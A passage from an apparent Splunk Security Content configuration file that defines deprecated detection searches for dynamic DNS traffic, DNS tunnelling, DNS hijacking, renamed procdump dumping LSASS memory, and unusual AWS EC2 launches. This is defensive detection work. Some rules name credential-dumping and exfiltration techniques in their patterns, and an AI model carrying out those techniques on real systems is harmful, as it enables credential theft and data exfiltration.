been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for web connections to dynamic DNS providers. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Web"] action.escu.eli5 = This search looks for web connections to dynamic DNS providers. action.escu.how_to_implement = This search requires you to be ingesting web-traffic logs. You can obtain these logs from indexing data from a web proxy or by using a network-traffic-analysis tool, such as Bro or Splunk Stream. The web data model must contain the URL being requested, the IP address of the host initiating the request, and the destination IP. This search also leverages a lookup file, `dynamic_dns_providers_default.csv`, which contains a non-exhaustive list of dynamic DNS providers. Consider periodically updating this local lookup file with new domains.\ This search produces fields (`isDynDNS`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** IsDynamicDNS, **Field:** isDynDNS\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details` Deprecated because duplicate. action.escu.known_false_positives = It is possible that list of dynamic DNS providers is outdated and/or that the URL being requested is legitimate. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect web traffic to dynamic domain providers - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dynamic DNS"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect web traffic to dynamic domain providers - Rule action.correlationsearch.annotations = {"analytic_story": ["Dynamic DNS"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for web connections to dynamic DNS providers. action.notable.param.rule_title = Detect web traffic to dynamic domain providers action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Web.url) as url min(_time) as firstTime from datamodel=Web where Web.status=200 by Web.src Web.dest Web.status | `drop_dm_object_name("Web")` | `security_content_ctime(firstTime)` | `dynamic_dns_web_traffic` | `detect_web_traffic_to_dynamic_domain_providers_filter` [ESCU - Detection of DNS Tunnels - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search is used to detect DNS tunneling, by calculating the sum of the length of DNS queries and DNS answers. The search also filters out potential false positives by filtering out queries made to internal systems and the queries originating from internal DNS, Web, and Email servers. Endpoints using DNS as a method of transmission for data exfiltration, Command And Control, or evasion of security controls can often be detected by noting an unusually large volume of DNS traffic. \ NOTE:Deprecated because existing detection is doing the same. This detection is replaced with two other variations, if you are using MLTK then you can use this search `ESCU - DNS Query Length Outliers - MLTK - Rule` or use the standard deviation version `ESCU - DNS Query Length With High Standard Deviation - Rule`, as an alternantive. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Network_Resolution"] action.escu.eli5 = This search is used to detect DNS tunneling, by calculating the sum of the length of DNS queries and DNS answers. The search also filters out potential false positives by filtering out queries made to internal systems and the queries originating from internal DNS, Web, and Email servers. Endpoints using DNS as a method of transmission for data exfiltration, Command And Control, or evasion of security controls can often be detected by noting an unusually large volume of DNS traffic. \ NOTE:Deprecated because existing detection is doing the same. This detection is replaced with two other variations, if you are using MLTK then you can use this search `ESCU - DNS Query Length Outliers - MLTK - Rule` or use the standard deviation version `ESCU - DNS Query Length With High Standard Deviation - Rule`, as an alternantive. action.escu.how_to_implement = To successfully implement this search, we must ensure that DNS data is being ingested and mapped to the appropriate fields in the Network_Resolution data model. Fields like src_category are automatically provided by the Assets and Identity Framework shipped with Splunk Enterprise Security. You will need to ensure you are using the Assets and Identity Framework and populating the src_category field. You will also need to enable the `cim_corporate_web_domain_search()` macro which will essentially filter out the DNS queries made to the corporate web domains to reduce alert fatigue. action.escu.known_false_positives = It's possible that normal DNS traffic will exhibit this behavior. If an alert is generated, please investigate and validate as appropriate. The threshold can also be modified to better suit your environment. action.escu.creation_date = 2022-02-15 action.escu.modification_date = 2022-02-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Detection of DNS Tunnels - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Data Protection", "Suspicious DNS Traffic", "Command And Control"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detection of DNS Tunnels - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Protection", "Suspicious DNS Traffic", "Command And Control"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is used to detect DNS tunneling, by calculating the sum of the length of DNS queries and DNS answers. The search also filters out potential false positives by filtering out queries made to internal systems and the queries originating from internal DNS, Web, and Email servers. Endpoints using DNS as a method of transmission for data exfiltration, Command And Control, or evasion of security controls can often be detected by noting an unusually large volume of DNS traffic. \ NOTE:Deprecated because existing detection is doing the same. This detection is replaced with two other variations, if you are using MLTK then you can use this search `ESCU - DNS Query Length Outliers - MLTK - Rule` or use the standard deviation version `ESCU - DNS Query Length With High Standard Deviation - Rule`, as an alternantive. action.notable.param.rule_title = Detection of DNS Tunnels action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` dc("DNS.query") as count from datamodel=Network_Resolution where nodename=DNS "DNS.message_type"="QUERY" NOT (`cim_corporate_web_domain_search("DNS.query")`) NOT "DNS.query"="*.in-addr.arpa" NOT ("DNS.src_category"="svc_infra_dns" OR "DNS.src_category"="svc_infra_webproxy" OR "DNS.src_category"="svc_infra_email*" ) by "DNS.src","DNS.query" | rename "DNS.src" as src "DNS.query" as message | eval length=len(message) | stats sum(length) as length by src | append [ tstats `security_content_summariesonly` dc("DNS.answer") as count from datamodel=Network_Resolution where nodename=DNS "DNS.message_type"="QUERY" NOT (`cim_corporate_web_domain_search("DNS.query")`) NOT "DNS.query"="*.in-addr.arpa" NOT ("DNS.src_category"="svc_infra_dns" OR "DNS.src_category"="svc_infra_webproxy" OR "DNS.src_category"="svc_infra_email*" ) by "DNS.src","DNS.answer" | rename "DNS.src" as src "DNS.answer" as message | eval message=if(message=="unknown","", message) | eval length=len(message) | stats sum(length) as length by src ] | stats sum(length) as length by src | where length > 10000 | `detection_of_dns_tunnels_filter` [ESCU - DNS Query Requests Resolved by Unauthorized DNS Servers - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search will detect DNS requests resolved by unauthorized DNS servers. Legitimate DNS servers should be identified in the Enterprise Security Assets and Identity Framework. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Network_Resolution"] action.escu.eli5 = This search will detect DNS requests resolved by unauthorized DNS servers. Legitimate DNS servers should be identified in the Enterprise Security Assets and Identity Framework. action.escu.how_to_implement = To successfully implement this search you will need to ensure that DNS data is populating the Network_Resolution data model. It also requires that your DNS servers are identified correctly in the Assets and Identity table of Enterprise Security. action.escu.known_false_positives = Legitimate DNS activity can be detected in this search. Investigate, verify and update the list of authorized DNS servers as appropriate. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - DNS Query Requests Resolved by Unauthorized DNS Servers - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["DNS Hijacking", "Suspicious DNS Traffic", "Host Redirection", "Command And Control"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - DNS Query Requests Resolved by Unauthorized DNS Servers - Rule action.correlationsearch.annotations = {"analytic_story": ["DNS Hijacking", "Suspicious DNS Traffic", "Host Redirection", "Command And Control"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search will detect DNS requests resolved by unauthorized DNS servers. Legitimate DNS servers should be identified in the Enterprise Security Assets and Identity Framework. action.notable.param.rule_title = DNS Query Requests Resolved by Unauthorized DNS Servers action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count from datamodel=Network_Resolution where DNS.dest_category != dns_server AND DNS.src_category != dns_server by DNS.src DNS.dest | `drop_dm_object_name("DNS")` | `dns_query_requests_resolved_by_unauthorized_dns_servers_filter` [ESCU - DNS record changed - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search takes the DNS records and their answers results of the discovered_dns_records lookup and finds if any records have changed by searching DNS response from the Network_Resolution datamodel across the last day. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Network_Resolution"] action.escu.eli5 = The search takes the DNS records and their answers results of the discovered_dns_records lookup and finds if any records have changed by searching DNS response from the Network_Resolution datamodel across the last day. action.escu.how_to_implement = To successfully implement this search you will need to ensure that DNS data is populating the `Network_Resolution` data model. It also requires that the `discover_dns_record` lookup table be populated by the included support search "Discover DNS record". \ **Splunk>Phantom Playbook Integration**\ If Splunk>Phantom is also configured in your environment, a Playbook called "DNS Hijack Enrichment" can be configured to run when any results are found by this detection search. The playbook takes in the DNS record changed and uses Geoip, whois, Censys and PassiveTotal to detect if DNS issuers changed. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search, and set the corresponding Playbook to active. \ (Playbook Link:`https://my.phantom.us/4.2/playbook/dns-hijack-enrichment/`).\ action.escu.known_false_positives = Legitimate DNS changes can be detected in this search. Investigate, verify and update the list of provided current answers for the domains in question as appropriate. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - DNS record changed - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["DNS Hijacking"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - DNS record changed - Rule action.correlationsearch.annotations = {"analytic_story": ["DNS Hijacking"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search takes the DNS records and their answers results of the discovered_dns_records lookup and finds if any records have changed by searching DNS response from the Network_Resolution datamodel across the last day. action.notable.param.rule_title = DNS record changed action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | inputlookup discovered_dns_records | rename answer as discovered_answer | join domain[|tstats `security_content_summariesonly` count values(DNS.record_type) as type, values(DNS.answer) as current_answer values(DNS.src) as src from datamodel=Network_Resolution where DNS.message_type=RESPONSE DNS.answer!="unknown" DNS.answer!="" by DNS.query | rename DNS.query as query | where query!="unknown" | rex field=query "(?\w+\.\w+?)(?:$|/)"] | makemv delim=" " answer | makemv delim=" " type | sort -count | table count,src,domain,type,query,current_answer,discovered_answer | makemv current_answer | mvexpand current_answer | makemv discovered_answer | eval n=mvfind(discovered_answer, current_answer) | where isnull(n) | `dns_record_changed_filter` [ESCU - Dump LSASS via procdump Rename - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. Detect a renamed instance of procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. Modify the query as needed.\ During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been ran, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = Detect a renamed instance of procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. Modify the query as needed.\ During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been ran, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node. action.escu.known_false_positives = None identified. action.escu.creation_date = 2021-02-01 action.escu.modification_date = 2021-02-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Dump LSASS via procdump Rename - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Credential Dumping", "HAFNIUM Group", "CISA AA22-257A"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Dump LSASS via procdump Rename - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "HAFNIUM Group", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` OriginalFileName=procdump process_name!=procdump*.exe EventID=1 (CommandLine=*-ma* OR CommandLine=*-mm*) CommandLine=*lsass* | stats count min(_time) as firstTime max(_time) as lastTime by dest, parent_process_name, process_name, OriginalFileName, CommandLine | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_rename_filter` [ESCU - EC2 Instance Modified With Previously Unseen User - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for EC2 instances being modified by users who have not previously modified them. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for EC2 instances being modified by users who have not previously modified them. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Launches By User" support search once to create a history of previously seen ARNs. To add or remove APIs that modify an EC2 instance, edit the macro `ec2_modification_api_calls`. action.escu.known_false_positives = It's possible that a new user will start to modify EC2 instances when they haven't before for any number of reasons. Verify with the user that is modifying instances that this is the intended behavior. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - EC2 Instance Modified With Previously Unseen User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Unusual AWS EC2 Modifications"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - EC2 Instance Modified With Previously Unseen User - Rule action.correlationsearch.annotations = {"analytic_story": ["Unusual AWS EC2 Modifications"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` `ec2_modification_api_calls` [search `cloudtrail` `ec2_modification_api_calls` errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by userIdentity.arn | rename userIdentity.arn as arn | inputlookup append=t previously_seen_ec2_modifications_by_user | stats min(firstTime) as firstTime, max(lastTime) as lastTime by arn | outputlookup previously_seen_ec2_modifications_by_user | eval newUser=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newUser=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=dest responseElements.instancesSet.items{}.instanceId | spath output=user userIdentity.arn | table _time, user, dest | `ec2_instance_modified_with_previously_unseen_user_filter` [ESCU - EC2 Instance Started In Previously Unseen Region - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where an instance is started in a particular region in the last one hour and then compares it to a lookup file of previously seen regions where an instance was started action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where an instance is started in a particular region in the last one hour and then compares it to a lookup file of previously seen regions where an instance was started action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. Run the "Previously seen AWS Regions" support search only once to create of baseline of previously seen regions. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.known_false_positives = It's possible that a user has unknowingly started an instance in a new region. Please verify that this activity is legitimate. action.escu.creation_date = 2018-02-23 action.escu.modification_date = 2018-02-23 action.escu.confidence = high action.escu.full_search_name = ESCU - EC2 Instance Started In Previously Unseen Region - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Cryptomining", "Suspicious AWS EC2 Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - EC2 Instance Started In Previously Unseen Region - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining", "Suspicious AWS EC2 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` earliest=-1h StartInstances | stats earliest(_time) as earliest latest(_time) as latest by awsRegion | inputlookup append=t previously_seen_aws_regions.csv | stats min(earliest) as earliest max(latest) as latest by awsRegion | outputlookup previously_seen_aws_regions.csv | eval regionStatus=if(earliest >= relative_time(now(),"-1d@d"), "Instance Started in a New Region","Previously Seen Region") | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | where regionStatus="Instance Started in a New Region" | `ec2_instance_started_in_previously_unseen_region_filter` [ESCU - EC2 Instance Started With Previously Unseen AMI - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for EC2 instances being created with previously unseen AMIs. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for EC2 instances being created with previously unseen AMIs. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen EC2 AMIs" support search once to create a history of previously seen AMIs. action.escu.known_false_positives = After a new AMI is created, the first systems created with that AMI will cause this alert to fire. Verify that the AMI being used was created by a legitimate user. action.escu.creation_date = 2018-03-12 action.escu.modification_date = 2018-03-12 action.escu.confidence = high action.escu.full_search_name = ESCU - EC2 Instance Started With Previously Unseen AMI - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Cryptomining"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - EC2 Instance Started With Previously Unseen AMI - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by requestParameters.instancesSet.items{}.imageId | rename requestParameters.instancesSet.items{}.imageId as amiID | inputlookup append=t previously_seen_ec2_amis.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by amiID | outputlookup previously_seen_ec2_amis.csv | eval newAMI=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` | where newAMI=1 | rename amiID as requestParameters.instancesSet.items{}.imageId | table requestParameters.instancesSet.items{}.imageId] | rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest, userIdentity.arn as arn, requestParameters.instancesSet.items{}.imageId as amiID | table firstTime, lastTime, arn, amiID, dest, instanceType | `ec2_instance_started_with_previously_unseen_ami_filter` [ESCU - EC2 Instance Started With Previously Unseen Instance Type - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for EC2 instances being created with previously unseen instance types. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for EC2 instances being created with previously unseen instance types. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Instance Types" support search once to create a history of previously seen instance types. action.escu.known_false_positives = It is possible that an admin will create a new system using a new instance type never used before. Verify with the creator that they intended to create the system with the new instance type. action.escu.creation_date = 2020-02-07 action.escu.modification_date = 2020-02-07 action.escu.confidence = high action.escu.full_search_name = ESCU - EC2 Instance Started With Previously Unseen Instance Type - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Cryptomining"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - EC2 Instance Started With Previously Unseen Instance Type - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | fillnull value="m1.small" requestParameters.instanceType | stats earliest(_time) as earliest latest(_time) as latest by requestParameters.instanceType | rename requestParameters.instanceType as instanceType | inputlookup append=t previously_seen_ec2_instance_types.csv | stats min(earliest) as earliest max(latest) as latest by instanceType | outputlookup previously_seen_ec2_instance_types.csv | eval newType=if(earliest >= relative_time(now(), "-70m@m"), 1, 0) | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | where newType=1 | rename instanceType as requestParameters.instanceType | table requestParameters.instanceType] | spath output=user userIdentity.arn | rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest | table _time, user, dest, instanceType | `ec2_instance_started_with_previously_unseen_instance_type_filter` [ESCU - EC2 Instance Started With Previously Unseen User - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for EC2 instances being created by users who have not created them before. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for EC2 instances being created by users who have not created them before. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Launches By User" support search once to create a history of previously seen ARNs. action.escu.known_false_positives = It's possible that a user will start to create EC2 instances when they haven't before for any number of reasons. Verify with the user that is launching instances that this is the intended behavior. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - EC2 Instance Started With Previously Unseen User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = 